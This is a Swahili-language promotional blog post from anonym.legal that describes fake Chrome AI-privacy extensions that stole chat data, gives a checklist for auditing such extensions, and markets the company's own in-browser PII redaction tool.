anonym.legal

By · Last updated 2026-04-19

Rudi kwa BlogUsalama wa AI

Je, Zana Yako ya Faragha ya AI Inaibia Data Yako?

Asilimia 67 ya nyongeza za AI za Chrome hukusanya data ya mtumiaji. Matukio ya Desemba 2025 yaliona watumiaji 900K wakiathiriwa na nyongeza zilizojifanya zana za faragha.

April 19, 20268 dakika kusoma
privacy extension verificationlocal processing trustextension data collection auditAI privacy tool evaluationChrome extension security checklist

Zana ya Faragha Inayoibia Data

Mnamo Desemba 2025, zana za Chrome zilizosambazwa kama walinzi wa faragha ya AI zilikamatwa zikifanya upelelezi. Zilipiga historia kamili za mazungumzo. Zilipitisha maudhui hayo kwenye seva zinazodhibitiwa na washambuliaji.

Hiyo ndiyo kitendawili cha msingi: zana ya faragha ikawa tishio.

Caviard.ai iligundua kwamba asilimia 67 ya nyongeza za AI za Chrome hukusanya data ya mtumiaji. Baadhi zinaifunua. Nyingine hazifunui. Lakini ufunuo si tatizo halisi. Tatizo halisi ni kama muundo wa zana unafanya wizi wa data kutowezekana kwa muundo -- au tu kupigwa marufuku na sera.

Ripoti ya DLA Piper ya GDPR ya 2025 iligundua ongezeko la asilimia 34 la kiasi cha wastani cha faini katika 2024 dhidi ya 2023. Mwelekeo huo unaongeza hatua kwa afisa yoyote wa ulinzi wa data anayeidhinisha zana za kivinjari kwa wafanyakazi.

Usindikaji Halisi wa Ndani Unavyoonekana

Zana halisi ya usindikaji wa ndani inafanya mfano wake wa ugunduzaji ndani ya kivinjari. Mfano unafungwa na usakinishaji au kupakuliwa mara moja. Baada ya hapo, maudhui hayaendi kamwe kwenye seva za mchapishaji.

Trafiki pekee inayotoka nje ni msururu uliofutwa utambulisho kwa huduma ya AI na maombi ya kawaida ya kivinjari kama ukaguzi wa masasisho. Maudhui hayvuki mtandao wa mchapishaji kamwe.

Muundo huu unaweza kupimwa na kuthibitishwa. Ahadi za mchapishaji haziwezi kuaminiwa peke yao. Matukio ya Desemba 2025 yalithibitisha hilo.

Jinsi ya Kuangalia Zana Yoyote ya Faragha

Usiulize kama mchapishaji anaahidi faragha. Uliza kama muundo unafanya wizi wa data kutowezekana.

Jaribio la mtandao: Sakinisha zana kwenye mtandao unaofuatiliwa. Bandika vitambulisho vya kibinafsi vya bandia katika akaunti ya majaribio ya AI. Angalia muunganisho wote unaotoka nje kwa sekunde 30. Ikiwa trafiki yoyote inaenda kwenye kikoa ambacho si jukwaa la AI au seva ya masasisho ya zana, maudhui yako yanageuziwa kwa njia nyingine.

Ukaguzi wa msimbo: Nyongeza za Chrome ni mifuruko ya JavaScript. Zinaweza kubainishwa. Zana halisi ya usindikaji wa ndani haina wito wa mtandao katika msimbo wake wa ugunduzaji. Hakuna fetch, hakuna XMLHttpRequest, hakuna WebSocket katika moduli ya ugunduzaji ni ishara nzuri. Uwepo wao ni kizuizi cha mwisho.

Ukaguzi wa ruhusa: Chrome Manifest V3 inahitaji ruhusa za wazi. Zana ya usindikaji wa ndani haihitaji ruhusa kutuma maudhui nje ya kivinjari. Ufikiaji wa ubao wa kunakili pamoja na ruhusa pana za mtandao -- bila sababu wazi -- ni ishara ya hatari.

Ukaguzi wa mchapishaji: Hadhi ya mchapishaji aliyethibitishwa kwenye Chrome Web Store inahitaji uthibitisho wa kikoa na nyaraka za utambulisho. Wachapishaji wapya wenye vikoa vipya wanaouza zana za faragha za AI wanahitaji uchunguzi wa ziada. Washambuliaji wa Desemba 2025 walitumia vitambulisho vya muda mfupi kuepuka kugundulika.

Watumiaji 900,000 Waliathiriwa

Uchambuzi wa Astrix Security wa Desemba 2025 uligundua watumiaji 900,000 walioathiriwa na nyongeza zilizojifanya zana za faragha. Watumiaji hao walichagua zana hizi kulinda vikao vyao vya AI. Zana zilifanya kinyume chake.

Kikao kimoja cha wafanyakazi kilichoathiriwa kinaweza kufunua rekodi za wateja, faili za kisheria, na mipango ya ndani. Muhtasari wa usalama na uzingatiaji unafafanua jinsi mnyororo huo wa hatari unavyofanya kazi.

Kuchagua Zana Unayoweza Kuthibitisha

Nyongeza ya Chrome ya anonym.legal inafanya ugunduzaji wa PII ndani kabisa ya kivinjari. Hakuna kitu kinachotumwa kwenye seva za anonym.legal wakati wowote.

Nyongeza zenye nia mbayaanonym.legal
UsindikajiSeva za mbaliKivinjari peke yake
Upeo wa ufikiajiKukamata kikao choteWakati tu inafanya kazi
Inaweza kuthibitishwa na mtumiajiHapanaNdio -- jaribu mtandao

Jinsi inavyofanya kazi:

  1. Unabandika maandishi yenye vitambulisho vya kibinafsi
  2. Ugunduzaji unafanya kazi ndani ya kivinjari chako
  3. Majina na vitambulisho vinakuwa ishara -- "Juma Mwangi" inakuwa [PERSON_1]
  4. Maandishi yaliyosafishwa yanaenda kwa AI
  5. Jibu la AI linarejeleshwa kwako ndani ya nchi

Kituo cha uzingatiaji kinashughulikia orodha kamili ya kitengo na maelezo ya ukaguzi wa biashara.

Vyanzo

Makala Zinazohusiana

Usalama wa AI

AI Coding Assistants Leak Production PII

Unit test fixtures with real customer records. Log files with production data for debugging. GitHub found 39 million secrets leaked in 2024.

Usalama wa AI

Internal Wiki PII: Confluence Customer Data

Support teams document processes with screenshots of customer accounts. Over 3 years, that's thousands of GDPR data minimization violations in your.

Usalama wa AI

Screenshot PII: Leaks in Internal Tools

Slack, Teams, Jira, and email regularly receive screenshots containing customer PII. This access-control violation bypasses every DLP tool.

Tayari kulinda data yako?

Anza kuanonymisha PII na aina 285+ za vitu katika lugha 48.

Anza Jaribio la BureTazama Vipengele

About this page

We update this page when our platform or the law changes.

Read our founder note for how we work.

Each change shows up in the timestamp at the top.

Related reading

We follow these rules

  • GDPR (EU 2016/679).
  • ISO/IEC 27001:2022.
  • NIS2 (EU 2022/2555).
  • HIPAA safe harbor under 45 CFR § 164.514(b)(2).

Our promise

We do not sell your data.

We do not train models on your text.

We store your files in Germany.

You can delete your account at any time.

You own your work.

Where we run

Our servers live in Falkenstein, Germany.

We use Hetzner. They hold ISO 27001 certification.

All data stays in the EU.

Backups run every day.

Need help?

Email support@anonym.legal.

We reply within one business day.

How we test

We run a full check suite on every release.

Each surface gets its own sweep script and report.

Human reviewers spot-check the output each week.

We track recall and precision on a labelled set.

Bad runs block the deploy.

What we never do

  • We never sell your information to third parties.
  • We never train models on what you upload.
  • We never keep your work after you delete it.
  • We never share keys with any outside firm.
  • We never run ads inside the product.

Plans in plain words

We sell credits, not seats.

One credit covers one short job.

Long jobs use a few credits each.

You can top up at any time.

Unused credits roll over each month.

Read the plans page for current rates.

Who built this

A small team of engineers and lawyers built this.

We ship from Europe and work in the open.

Our founder note spells out why we started.

Where to start

How the parts fit

A browser add-on cleans text inside Chrome.

A Word plug-in handles drafts in Office.

A small desktop tool works on whole folders.

An agent protocol link feeds large models safely.

All four share one core engine and one rule set.

Words from our team

We started this work after a lunch about cookies.

One friend kept getting odd ads on her phone.

We asked why a court file leaked through a draft.

We sketched the first build on a napkin that week.

By month three we had a tiny demo for a friend.

She used it on her first case the next day.

Common questions we hear

Can the tool read scanned PDFs? Yes, with OCR.

Does it work on long files? Yes, in small chunks.

Can I roll my own rule set? Yes, save it as a preset.

Does it run offline? The desktop build runs offline.

Do you keep my files? No, the cloud build wipes after each run.

Will it learn from my work? No, we never train on inputs.

A short tour of the workflow

Upload a file or paste a snippet of prose.

Pick the entities you want gone from the draft.

Choose a method: replace, mask, hash, encrypt, or redact.

Press run and watch the side panel show each hit.

Skim the result and tweak any rule that misfired.

Save the cleaned file or send it to a teammate.